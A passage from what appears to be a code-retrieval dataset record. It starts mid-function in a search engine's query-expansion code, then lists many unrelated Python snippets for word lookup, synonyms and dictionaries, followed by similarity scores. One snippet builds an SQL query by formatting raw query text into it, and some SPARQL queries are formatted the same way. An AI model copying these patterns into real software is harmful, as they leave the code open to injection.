for correction- take the first one that is in inverted index\n if self._indexer.check_upper_lower(inverted_index, word)[1] is False: # word not in inverted index\n if word[0].isupper() is True:\n is_upper = True\n options = spell.candidates(word)\n is_found = False\n i = 0\n options = list(options)\n while i < len(options):\n if self._indexer.check_upper_lower(inverted_index, options[i])[1] is True:\n corrected = options[i]\n is_found = True\n break\n i += 1\n # corrected = spell.correction(word)\n if is_found is not False and corrected != query_as_list[index]:\n if is_upper is True:\n corrected = corrected.capitalize()\n query_as_list[index] = corrected\n doc_query_app = self.finished_dict(\" \".join(query_as_list), inverted_index)\n\n elif dict_of_methods['word2vec'] == True:\n words_to_add = {}\n doc_query_app = self.finished_dict(query, inverted_index)\n query_as_list = query.split()\n insert_new_words = []\n for word in query_as_list:\n if word in self._model.wv.wv.vocab:\n lst_sim_word_model = self._model.most_similar(word.lower())\n for similiar_word in lst_sim_word_model:\n if similiar_word[1] > 0.33:\n insert_new_words.append(similiar_word[0])\n\n # if len(insert_new_words) == 0:\n # continue\n idx = 0\n while idx < len(insert_new_words):\n if insert_new_words[idx] in doc_query_app.keys() or insert_new_words[idx] in words_to_add.keys():\n idx += 1\n continue\n tested = self._indexer.check_upper_lower(inverted_index, insert_new_words[idx])\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n idx += 1\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.6\n break\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.6\n break\n idx += 1\n doc_query_app.update(words_to_add)\n\n elif dict_of_methods['thesaurus'] == True:\n doc_query_app = self.finished_dict(query, inverted_index) # first parse query words\n list_of_query = list(doc_query_app.keys())\n words_to_add = {}\n # get each query word its synonyms and add to query the first that is in inverted index\n stop = set(stopwords.words('english'))\n results = [thes.synonyms(i, fileid=\"simN.lsp\") for i in list_of_query if i not in stop]\n results_as_list = list(results)\n for words in results_as_list:\n inside_list = list(words)\n if len(inside_list) == 0:\n continue\n idx = 0\n while idx < len(inside_list):\n if inside_list[idx] in doc_query_app.keys() or inside_list[idx] in words_to_add.keys():\n idx += 1\n continue\n tested = 
self._indexer.check_upper_lower(inverted_index, inside_list[idx])\n if tested[1] is False or tested[0] in doc_query_app.keys() or tested[0] in words_to_add.keys():\n idx += 1\n continue\n if tested[1] is True:\n words_to_add[tested[0]] = 0.0001\n break\n elif tested[1] is 'replace':\n words_to_add[tested[0].upper()] = 0.0001\n break\n idx += 1\n doc_query_app.update(words_to_add)\n\n else: # dict_of_methods['parser'] = True\n doc_query_app = self.finished_dict(query, inverted_index)\n\n if len(doc_query_app) == 0:\n return []\n\n dict_relevant_docs = self._relevant_docs_from_posting(doc_query_app, posting)\n ranked_doc_ids = Ranker.rank_relevant_docs(dict_relevant_docs , posting, documents, doc_query_app)\n n_relevant = len(ranked_doc_ids)\n return n_relevant, ranked_doc_ids", "def koreksi_elongasi(word, df_crc=df_crc):\n if list(df_crc['formal'][df_crc['slang']=='{}'.format(word)].values) == []:\n return word\n return df_crc['formal'][df_crc['slang']=='{}'.format(word)].values[0]", "def wiktionary(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must tell me what to look up!')\n return\n\n _etymology, definitions = wikt(word)\n if not definitions:\n # Cast word to lower to check in case of mismatched user input\n _etymology, definitions = wikt(word.lower())\n if not definitions:\n bot.reply(\"Couldn't get any definitions for %s.\" % word)\n return\n\n result = format(word, definitions)\n if len(result) < 300:\n result = format(word, definitions, 3)\n if len(result) < 300:\n result = format(word, definitions, 5)\n\n bot.say(result, truncation=' […]')", "def test_issue4104(en_lookup_nlp):\n words = [\"dry\", \"spun\", \"spun-dry\"]\n doc = Doc(en_lookup_nlp.vocab, words=words)\n lemmatizer = en_lookup_nlp.get_pipe(\"lemmatizer\")\n doc = lemmatizer(doc)\n assert [token.lemma_ for token in doc] == [\"dry\", \"spin\", \"spin-dry\"]", "def search_word(word : str = typer.Argument(..., help=\"Searches the trie if the word exists\")):\n response_url = url + \"/search/\" + word\n response = requests.get(response_url)\n typer.echo(response.json()[\"status\"])", "def search(self, word):\n return self.helper(word, self.root)", "def search(self, word):\n return self.helper(word, self.root)", "def lookup(self, term):\n results = []\n lookup_term = term.lower()\n for char, latex, description, user_description in self.entries:\n if (char == term or\n latex.startswith(lookup_term) or\n latex[1:].startswith(lookup_term) or\n lookup_term in description.lower() or\n (user_description and lookup_term in user_description)):\n results.append((char, latex, description, user_description))\n return results", "def search(self, word):\n return self.find(self.root,word)", "def get_definition(request):\n result = \"No result\"\n if request.method == \"GET\":\n word = request.GET.get(\"get_word\", None)\n syns = wn.synsets(word)\n if len(syns) > 0:\n result = syns[0].definition()\n else:\n result = \"no result for word:\" + word\n return render(request, \"blog/re_definition.html\", {'result': result, 'word': word})", "def search_single_word(word):\n # YOUR CODE HERE #\n pass # delete this when you write your code", "def get_embeddings_for_word(target_word, tt, token_embeddings, sentence, anaphor = False):\n if target_word not in tt:\n og_index = find_og_index(target_word, sentence)\n return get_wordpiece_embeddings(og_index, tt, token_embeddings)\n\n ## Get all indices of target word\n indices = [i for i, x in enumerate(tt) if x == target_word]\n if anaphor:\n target_index = indices[-1]\n 
else:\n target_index = indices[0]\n # Index of target word\n # target_index = tt.index(target_word)\n\n return token_embeddings[target_index]", "def suggest(word, cutoff=0.77):\n if word in LOOKUP_TABLE:\n return LOOKUP_TABLE[word]\n\n guess = difflib.get_close_matches(word, MOST_COMMON_DOMAINS, n=1, cutoff=cutoff)\n if guess and len(guess) > 0:\n return guess[0]\n return word", "def get_lemma(word):\n return stemmer.stem(word)", "def search_word(word,db):\n\tresults = {}\n\tfor w in word.split(' '):\n\t\ttemp = db.search(w)\n\t\tfor count,url,found_text in temp:\n\t\t\tif results.has_key(url):\n\t\t\t\tresults[url][0] += count\n\t\t\t\tif results[url][1] == \"None\":\n\t\t\t\t\tresults[url][1] = found_text\n\t\t\telse:\n\t\t\t\tresults[url] = [count,found_text]\t\n\t# sort the results according to the occurence\n\tif results:\n\t\tprint \"Results for '%s'\" % word\n\t\tfor url in sorted(results, key=results.get, reverse=True):\n\t\t\tif results[url][1] != \"None\":\n\t\t\t\tprint url, \" [ \",results[url][1], \" ] \"\n\t\t\telse:\n\t\t\t\tprint url\n\telse:\n\t\tprint \"No Results Found.\"", "def search_for_word(self, word, depth=\"shallow\"):\n\n # self._get_search_response(word)\n self._extract_html(uri_for_search(word))\n\n results = self.html.select(\".concept_light.clearfix\")\n # print(results)\n fmtd_results = []\n\n if depth == \"shallow\":\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n elif depth == \"deep\":\n\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n # If there are more than 20 results on the page, there is no \"More Words\" link\n more = self.html.select_one(\".more\")\n\n while more:\n link = more.get(\"href\")\n response = requests.get(r\"http:\" + link, timeout=5)\n html = BeautifulSoup(response.content, \"html.parser\")\n results = html.select(\".concept_light.clearfix\")\n\n for r in results:\n fmtd_results.append(self._extract_dictionary_information(r))\n\n more = html.select_one(\".more\")\n\n return fmtd_results", "def get_searched_single_word_synonym(self, content, stop_words):\n content = re.sub(r\"[^\\w\\s]\", \"\", content)\n content = re.sub(r\"[0-9]+\", \"\", content)\n new_sent = [\n Word(word).singularize()\n for word in content.lower().split()\n if Word(word).singularize() not in stop_words\n ]\n new_sent = [\n Word(word).singularize()\n for word in new_sent\n if Word(word).singularize() in set(self.searched_words)\n ]\n\n syn = []\n for w in new_sent:\n for s in wordnet.synsets(w):\n for lemma in s.lemmas():\n if len(syn) == SYNONYM_LIMIT:\n break\n syn.append(lemma.name())\n syn = list(dict.fromkeys(syn)) #\n syn = \" \".join(syn)\n return syn", "def word_finder(request):\n correction = \" \"\n error = \" \"\n alist = [\"NONE\"]\n if request.method == \"GET\":\n spell_checker(request)\n\n return render(request, \"blog/word_finder.html\", {'correction' : correction, 'error': error, 'args': alist})", "def words(self, word):\n pass", "def return_wikipedia_term(res):\n rst = []\n if res['spotted']:\n for s in [s['spot'] for s in res['value']['spots']]:\n r = TagMeService.retrieve_taggings(s.encode('utf-8'), method='POST')\n if len(r['annotations']) != 0:\n for n in r['annotations']:\n if 'title' in n.keys():\n title = n['title'].replace(' ', '_') # strip whitespaces from dbpedia tag\n rst.append(title)\n else:\n print \"Cannot find title in annotations: \" + str(n)\n return rst", "def get_speech(self, word):\n posses = ['verb', 'noun', 'adj', 'adv', 'as in', 'conjunction']\n 
speeches = []\n\n def get_all_synonyms(word1, speech1):\n for w in Word(word1).synonyms('all', partOfSpeech=speech1):\n if not w == []:\n return w\n return []\n\n def empty_tree(input_list):\n # print(input_list)\n if type(input_list) == type([]):\n for l in input_list:\n if not empty_tree(l):\n return False\n return True\n else:\n return False\n\n for poss in posses:\n if not empty_tree(get_all_synonyms(word, poss)):\n speeches.append(poss)\n return speeches", "def getWord(self,):\n\t\treturn self.word;", "def urban_dict(word):\n\n url = \"https://mashape-community-urban-dictionary.p.rapidapi.com/define\"\n\n querystring = {}\n\n querystring[\"term\"] = word\n\n headers = config.headers\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def get_word():\n word=words_dict[randrange(0,len(words_dict))]\n return word", "def info_content(self,lookup_word):\n\t if self.N == 0:\n\t # poor man's lazy evaluation\n\t for sent in brown.sents():\n\t for word in sent:\n\t word = word.lower()\n\t if not word in self.brown_freqs.keys():\n\t self.brown_freqs[word] = 0\n\t self.brown_freqs[word] = self.brown_freqs[word] + 1\n\t self.N = self.N + 1\n\t lookup_word = lookup_word.lower()\n\t n = 0 if not lookup_word in self.brown_freqs.keys() else self.brown_freqs[lookup_word]\n\t return 1.0 - (math.log(n + 1) / math.log(self.N + 1))", "def _index_phrase_words(self, phrase: Phrase) -> None:\n if phrase.phrase_string not in self.phrase_type:\n raise ValueError(f\"Cannot index phrase words for non-registered phrase: {phrase.phrase_string}\")\n for wi, word in enumerate(re.finditer(r\"\\w+\", phrase.phrase_string)):\n if wi == 0:\n self.first_word_in_phrase[word.group(0)][phrase.phrase_string] = word.start()\n self.word_in_phrase[word.group(0)].add(phrase.phrase_string)", "def search(self, word):\r\n return self.DFS(word, 0, 0, self.trie.root)", "def two_word_finder(word1,word2,text):\r\n word1 = word1.lower()\r\n word2 = word2.lower()\r\n text = str(text).lower()\r\n if word1 and word2 in text:\r\n return True #return text to see specific tweets\r\n return False", "def wordInfo(self, input_word):\n return self.app.get('/words/1.0/info/' + input_word, follow_redirects=True, headers=self.headers)", "def translate_leet(phrase):", "def searchphrases(query):\n query_nostopwords = removestopwords(query)\n query_lemmatized = lemmatize(query_nostopwords) #look like\n phraseids = []\n ngramids=[]\n words=query_lemmatized.split()\n query_ngram = \"select id from ngrams where lower(lemmangrams) like lower('%{}%')\".format(query_lemmatized)+\" or lower(lemmangrams) like lower('%{}%')\".format(words[0])\n for word in words[1:]:\n query_ngram=query_ngram+\" or lower(lemmangrams) like lower('%{}%')\".format(word)\n con = it.engine.execute(query_ngram)\n rows_phrase = con.fetchall()\n if rows_phrase:\n ngramids = list(set([str(i[0]) for i in rows_phrase]))\n phraseids.extend(ngramids)\n phraseids = list(set(phraseids))\n results=categorize(phraseids)\n return results", "def get_synonyms(word):\n syns_sets = wordnet.synsets(word)\n if syns_sets:\n # if there's synonyms, take the first set\n desired = syns_sets[0].lemma_names()\n desired = [the_name.replace(\"_\", \" \") for the_name in desired]\n return desired\n\n else:\n return False", "def lookup():", "def wikipedia_search(result,sentence):\r\n result = 
wikipedia.summary(result,sentences=sentence)\r\n return result", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def choose_word():\n pass", "def searchGlossary(self,keyword):\n\t\twords = []\n\n\t\tfor letter in glossary:\n\t\t\tfor word in glossary[letter]:\n\t\t\t\tprint word.keys()[0]\n\t\t\t\tif keyword.lower() in word.keys()[0].lower():\n\t\t\t\t\twords.append(word)\n\n\t\treturn words", "def wiktionary_ety(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must give me a word!')\n return\n\n etymology, _definitions = wikt(word)\n if not etymology:\n bot.reply(\"Couldn't get the etymology for %s.\" % word)\n return\n\n result = \"{}: {}\".format(word, etymology)\n\n bot.say(result, truncation=' […]')", "def lookup(self, pos, word_pat, enable_de=True):\n from sagas.ru.ru_dictionary import RuDictionary\n print('.. load dictionary')\n dic=RuDictionary(pos=pos)\n rs=dic.lookup(word_pat, enable_de)\n print(rs)", "def get_word(naf: KafNafParser, term: Cterm) -> str:\n tokenids = naf.get_dict_tokens_for_termid(term.get_id())\n tokens = sort_tokens(naf.get_token(tid) for tid in tokenids)\n return \" \".join(t.get_text() for t in tokens)", "def query_word(self, word):\n if self.endpoint.startswith('http://'):\n # url\n return [r[0] for r in rqlquery(self.endpoint, self.query % {'word': word})]\n else:\n return [r[0] for r in rqlquery(self.endpoint, self.query, word=word)]", "def tf(word,document):\n words = document.split()\n\n return sum(1 for w in words if w == word)", "def search(self, word):\n return self.__search(self.__root, word,0)", "def lookup(*args):\n lemma, results = etym(*args)\n languages = nest()\n if not results:\n query, _, dictionary = args\n lemma, results = etym(query, None, dictionary)\n for result in results:\n languages[lemma][unicode(result['pos'])] = result['languages']\n return languages", "def lookup(doc, wv):\n checked = []\n for word in doc:\n try:\n word in wv\n except KeyError:\n log.warning(\"Word not in model: %s\", word)\n continue\n checked.append(wv[word])\n vec = np.mean(checked, axis=0)\n return vec", "def search(self, word):\n node = self.root\n return self.searchHelper(node, word)", "def _word_lookup(self, key: str) -> int:\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx", "def lookup_concept(wikidataId):\n\n if cfg.USE_CACHE:\n if (wikidataId in LOOKUP_DICT):\n return LOOKUP_DICT[wikidataId]\n \n response_json = wa.request_entity_fishing_concept_lookup(wikidataId)\n \n if not response_json:\n return nan\n\n if 'statements' not in response_json.keys():\n return nan\n\n for statement in response_json['statements']:\n if statement['propertyId'] == 'P1566':\n logger.debug('GeoNamesID found for %s: %s', wikidataId, statement['value'])\n if cfg.USE_CACHE:\n LOOKUP_DICT[wikidataId] = statement['value']\n return statement['value']\n\n \n return nan", "def synonyms_wiktionary(name, lang=\"fr\"):\n import wptools\n page = wptools.page(name, wiki='{0}.wiktionary.org'.format(\n lang), lang=lang, silent=True)\n page.get_parse()\n text = page.data['wikitext']\n syn = \"==== {{S|synonymes}} ====\"\n if syn not in text:\n return None\n text = text.split(syn)[1].split(\"====\")[0]\n reg = re.compile(\"[[]{2}(.*?)[]]{2}\")\n res = reg.findall(text)\n return res", "def find_related_concepts(text):\n #\n # Find wikipedia terms in text\n # Spot terms in text\n text = text.encode('ascii', 'replace')\n response = 
TagMeService.check_spotting(text)\n\n results = return_wikipedia_term(response)\n\n #\n # Lookup terms in taxonomy and fetch relatedConcepts (keywords)\n # return related terms if they are found in the taxonomy\n\n return lookup_in_taxonomy(results)", "def translate(word: str) -> str:\n global LINE_DIVIDER\n\n parser = WiktionaryParser()\n def_ = parser.fetch(word.lower())\n ret = \"\"\n for word_payload in def_:\n definitions = word_payload['definitions']\n\n translations = {d['partOfSpeech']: LINE_DIVIDER.join(d['text'])\n for d in definitions}\n ret += LINE_DIVIDER.join(f\"{k}: {v}\" for k,v in translations.items())\n\n return ret", "def get_word_for_gloss(annotation_value, mapping):\n\n # get the XML parent, called <REF_ANNOTATION>\n ref_annotation = annotation_value.getparent()\n # find the attributed called ANNOTATION_REF, which gives the ID of the referred annotation\n annotation_ref = ref_annotation.attrib[\"ANNOTATION_REF\"]\n wordtext = mapping.get(annotation_ref, \"\")\n return wordtext", "def test_contains_returns_true_when_word_in_trie(full_trie):\n assert full_trie.contains(\"hey\") is True", "def rhymeWords(self, input_word):\n return self.app.get('/words/1.0/rhyme/' + input_word, follow_redirects=True, headers=self.headers)", "def get_person_text(self, uid):\n words = \"\"\n\n query = \"\"\"\nSELECT ?overview ?researchO ?label\nWHERE\n{\n <%s> <http://vivoweb.org/ontology/core#overview> ?overview .\n <%s> <http://vivoweb.org/ontology/core#researchOverview> ?researchO .\n <%s> <http://www.w3.org/2000/01/rdf-schema#label> ?label .\n}\n \"\"\" % (uid, uid, uid)\n self.setQuery(query)\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n words = \"%s %s %s\" % (g['results']['bindings'][0]['overview']['value'], g['results']['bindings'][0]['researchO']['value'], g['results']['bindings'][0]['label']['value'])\n except:\n print \"Select failed: %s\" % query\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\nSELECT ?name\nWHERE\n{\n ?auth vivo:relates <%s> .\n ?auth rdf:type vivo:Authorship .\n ?auth vivo:relates ?art .\n filter (?art!=<%s>) .\n ?art <http://vivoweb.org/ontology/core#dateTimeValue> ?date .\n ?date <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?art rdfs:label ?name .\n}\nLIMIT 20\n\"\"\" % (uid, uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n\nSELECT ?name\nWHERE\n{\n ?grant vivo:relates <%s> .\n ?grant rdf:type vivo:Grant .\n ?grant <http://vivoweb.org/ontology/core#dateTimeInterval> ?date .\n ?date <http://vivoweb.org/ontology/core#end> ?end .\n ?end <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?grant rdfs:label ?name .\n}\n\n \"\"\" % (uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n 
except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n\n\n\n return words", "def lookup(name):", "def lookup(name):", "def get_word_context(word):\r\n\tfor content, profile in word_context_profile:\r\n\t\tif word == content:\r\n\t\t\treturn profile \r\n\treturn 0", "def analyze_words(self):\n\t\t\n\t\tword_analysis = {}\n\t\tfor word in self.word_list:\n\t\t\tif word not in word_analysis:\n\t\t\t\tacademic = (word in LEMMA_DICT)\n\t\t\t\tlength = len(word)\n\t\t\t\tfrequency = len(self.word_list[word])\n\t\t\t\tstem = word\t\n\t\t\t\tword_location_index = len(self.sentence_index)-1 #first set it as the last index\n\t\t\t\t\n\t\t\t\tfor index, sentence in self.sentence_index.items():\n\t\t\t\t\tif word in sentence.split():#need to be individual words, not parts of a word\n\t\t\t\t\t\tword_location_index = index \n\t\t\t\t\t\tbreak\n\t\t\t\t\tif self.word_list[word][0] in sentence.split():#accounts for words with upper cases\n\t\t\t\t\t\tword_location_index = index\n\t\t\t\t\t\n\t\t\t\t#selection critera\n\t\t\t\tif academic:\n\t\t\t\t\tselection_criteria = 'academic word'\n\t\t\t\telif frequency > 1: \n\t\t\t\t\tselection_criteria = 'high frequency'\n\t\t\t\telse:\n\t\t\t\t\tselection_criteria = 'word length'\n\n\t\t\t\tword_analysis[word] = (academic, length, frequency, stem, word_location_index, selection_criteria)\n\t\t\n\t\tself.word_analysis = word_analysis\n\t\t\n\t\treturn self.word_analysis", "def replace_similar_sound(word):\n for (key, value) in SIMILAR.items():\n if word in value:\n return str(key)\n raise Exception('No similar sound was found')", "def similarWords(targetWordList,targetWord):\n print(\"\\n\" + \"Similar words for '\" + targetWord + \"': \")\n text = nltk.Text(targetWordList)\n print(text.similar(targetWord))", "def define(word: str):\n try:\n r = requests.get(\"http://www.urbandictionary.com/define.php?term={}\".format(word)) # goes to link for word\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\"\n # header is the word we are defining\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n meaning = \"```\" + meaning + \"```\"\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n example = example.replace(str(x) + \". \", \"\\n\" + str(x) + \". 
\")\n output = def_header + \": \" + meaning + \" \" + \"\\nExample: \" + \"```\" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example\n except AttributeError:\n return \"No results\"", "def aux_lemma(word):\n if re.match(r\"(does|did|doing)\", word):\n return (\"do\")\n elif re.match(r\"(had|has|'ve|having)\", word):\n return (\"have\")\n elif re.match(r\"(is|are|am|was|were|been|'s|being)\", word):\n return (\"be\")\n elif word == (\"'d\"):\n return (\"would\")\n else:\n return word.lower()", "def token_to_alias(raw_text, vocab):\n pass", "def word_of_the_day():\n r = requests.get(\"http://www.urbandictionary.com\") # link is always homepage\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\" # header is the word we are defining\n # def_header = def_header[0:len(def_header) - 10] # header always ends in \"unknown\" this removes it\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n # formatting TODO move to controller\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n for x in [\"v.\", \"n.\"]:\n meaning = meaning.replace(x, x.upper()[:-1])\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n output = def_header + \": \" + \"```\" + meaning + \"\\nEx: \" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example", "def spell_a_word(cls, voice_transcript, skill, **kwargs):\n tags = cls._extract_tags(voice_transcript, skill['tags'])\n for tag in tags:\n reg_ex = re.search(tag + ' ([a-zA-Z]+)', voice_transcript)\n try:\n if reg_ex:\n search_text = reg_ex.group(1)\n for letter in search_text:\n cls.response(letter)\n time.sleep(2)\n except Exception as e:\n logging.debug(e)\n cls.response(\"I can't spell the word\")", "def search(self, word):\n return self.subsearch(self.root, word)", "def __call__(self, word):\n return self.parse_request(self.request(f\"https://www.dictionaryapi.com/api/v3/references/collegiate/json/{word}?key={self.apikey}\"), word)", "def get_dictionary_response(word):\r\n word_metadata = {}\r\n definition = \"sorry, no definition is available right now.\"\r\n example = \"sorry, no examples are available right now.\"\r\n synonyms = [\"sorry, no synonyms are available right now.\"]\r\n antonyms = [\"sorry, no antonyms are available right now.\"]\r\n api_key = os.getenv(\"KEY_THESAURUS\")\r\n url = f\"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}?key={api_key}\"\r\n response = requests.get(url)\r\n api_response = json.loads(response.text)\r\n if response.status_code == 200:\r\n for data in api_response:\r\n try:\r\n if data[\"meta\"][\"id\"] == word:\r\n try:\r\n if len(data[\"meta\"][\"syns\"]) != 0:\r\n synonyms = data[\"meta\"][\"syns\"][0]\r\n if len(data[\"meta\"][\"ants\"]) != 0:\r\n antonyms = data[\"meta\"][\"ants\"][0]\r\n for results in data[\"def\"][0][\"sseq\"][0][0][1][\"dt\"]:\r\n if results[0] == \"text\":\r\n definition = results[1]\r\n if results[0] == \"vis\":\r\n example = results[1][0][\"t\"].replace(\"{it}\", \"*\").\\\r\n replace(\"{/it}\", \"*\")\r\n except KeyError as e:\r\n print(e)\r\n except 
TypeError as e:\r\n print(e)\r\n break\r\n word_metadata[\"meaning\"] = definition\r\n word_metadata[\"example\"] = example\r\n word_metadata[\"antonyms\"] = antonyms\r\n word_metadata[\"synonyms\"] = synonyms\r\n return word_metadata", "def getDisambiguatedByNextNoun(self, word):\n\t\treturn disambig_const.DISAMBIGUATATION_TABLE.get(word, {}).get('noun', {}).get('vocalized', word);", "def get_most_informative_word(self, documents, vocabulary):\n most_informative_word = None\n most_informative_word_gain = 0\n for word in vocabulary:\n gain = self.get_information_gain(word, documents)\n if most_informative_word == None or gain >= most_informative_word_gain:\n most_informative_word = word\n most_informative_word_gain = gain\n return most_informative_word", "def get_new_word(key, chains):\n values = chains[key]\n return choice(values)", "def findWords(self, var, vartype):\n vartext = var.get().lstrip()\n if vartype == 'cat':\n # looking up the words from a category\n SQLquery = 'SELECT word FROM words WHERE category IN \\\n (SELECT lowerlevel FROM cathierarchy WHERE upperlevel=?)'\n elif vartype == 'subcat':\n # looking up the words from a subcategory\n SQLquery = 'SELECT word FROM words WHERE category=?'\n\n with sqlite3.connect(self.dbpath) as conn:\n cursor = conn.cursor()\n cursor.execute(SQLquery, (vartext,))\n find = cursor.fetchall()\n find = tools.listOfTuplesToList(find)\n return self._mySort(find)", "def translate(self, word, context=None, pos_tag=None):\n #Get contextual translation from google translate\n par = {\"text\": word, \"raw\": \"raw\"}\n r = requests.post(self.translation_url, data=par)\n results = r.text\n translated_word = get_from_html_text(results, 'TRANSLATED_TEXT')\n \n #Perform lookup in the text file from the C# translator\n #if there is no match, take the best match from the bing file\n# print \"Translated: \", word, \" ->\", translated_word\n return translated_word", "def getWord(self, word, useCanonical=None, includeSuggestions=None, ):\n\n # Parse inputs\n resourcePath = '/word.{format}/{word}'\n resourcePath = resourcePath.replace('{format}', 'json')\n method = 'GET'\n\n queryParams = {}\n headerParams = {}\n\n queryParams['useCanonical'] = self.apiClient.toPathValue(useCanonical)\n queryParams['includeSuggestions'] = self.apiClient.toPathValue(includeSuggestions)\n\n\n if word != None:\n resourcePath = resourcePath.replace('{word}', word)\n\n\n # Make the API Call\n response = self.apiClient.callAPI(resourcePath, method, queryParams,\n None, headerParams)\n if not response:\n return None\n\n # Create output objects if the response has more than one object\n responseObject = self.apiClient.deserialize(response,\n model.WordObject.WordObject)\n return responseObject", "def test_refersto_multi_word_no_quotes_no_index(self):\n inv_search = 'refersto:\"s parke\"'\n spi_search = 'find refersto s parke'\n self._compare_searches(inv_search, spi_search)" ]
[ "0.71993554", "0.6819215", "0.6670339", "0.6578899", "0.6435337", "0.6270199", "0.6232829", "0.6166652", "0.61357725", "0.60544753", "0.59272295", "0.59103805", "0.59084", "0.59001476", "0.58918864", "0.58608", "0.5855626", "0.5844507", "0.58381885", "0.58219075", "0.58169264", "0.58109945", "0.5802205", "0.5796834", "0.5750214", "0.5730169", "0.5729431", "0.5718449", "0.5718129", "0.5718129", "0.5699858", "0.56992894", "0.56968945", "0.56932884", "0.56921273", "0.56857", "0.56713974", "0.5666982", "0.5652448", "0.5648445", "0.5647", "0.5643668", "0.56411403", "0.5634968", "0.5631329", "0.5631214", "0.56301636", "0.56301636", "0.56301636", "0.5624995", "0.56233877", "0.5620168", "0.5614202", "0.5609905", "0.56077033", "0.55981064", "0.5596738", "0.5596687", "0.5592517", "0.55899936", "0.5589221", "0.55845845", "0.5582841", "0.55824983", "0.55800176", "0.5577813", "0.55748934", "0.55688834", "0.5566336", "0.5556202", "0.55463964", "0.554337", "0.55384725", "0.55326366", "0.55293936", "0.5527786", "0.5522661", "0.55216867", "0.55208766", "0.5516905", "0.5512751", "0.5512751", "0.55126333", "0.55062807", "0.54989403", "0.5498006", "0.548938", "0.54880023", "0.5485214", "0.5483119", "0.54768866", "0.5471828", "0.54712313", "0.5467567", "0.54638344", "0.54613495", "0.54599106", "0.5458539", "0.5457968", "0.5457365", "0.54478186" ]
0.0
-1
AMAZON.FallbackIntent is only available in the en-US locale. This handler will not be triggered except in that locale, so it is safe to deploy on any locale.
def fallback_handler(handler_input):
    # type: (HandlerInput) -> Response
    speech = (
        "The {} skill can't help you with that. "
        "I can look up a word in the dictionary for you").format(skill_name)
    reprompt = ("I can look up a word in the dictionary, "
                "Just say any word in English")
    handler_input.response_builder.speak(speech).ask(reprompt)
    return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fall_back_message():\r\n card_title = \"Fallback Message\"\r\n fallback_string = \"Sorry. I couldn't understood it. Please say again.\"\r\n should_end_session = False\r\n session_attributes = { \r\n \"speech_output\": fallback_string,\r\n \r\n \r\n }\r\n\r\n return build_response(session_attributes, build_speechlet_response(card_title, fallback_string, \"Ask me to say hello...\", should_end_session))", "def _fallback_range(self, utterances, lang, message, fb_range):\n msg = message.reply(\n 'mycroft.skills.fallback',\n data={'utterance': utterances[0][0],\n 'lang': lang,\n 'fallback_range': (fb_range.start, fb_range.stop)}\n )\n response = self.bus.wait_for_response(msg, timeout=10)\n if response and response.data['handled']:\n ret = IntentMatch('Fallback', None, {}, None)\n else:\n ret = None\n return ret", "def get_fallback_response():\n\n speech_output = FALLBACK_MESSAGE\n return response(speech_response(speech_output, False))", "def get_fallback_response():\n\n speech_output = FALLBACK_MESSAGE\n return response(speech_response(speech_output, False))", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The Transit Time skill can't help you with that. 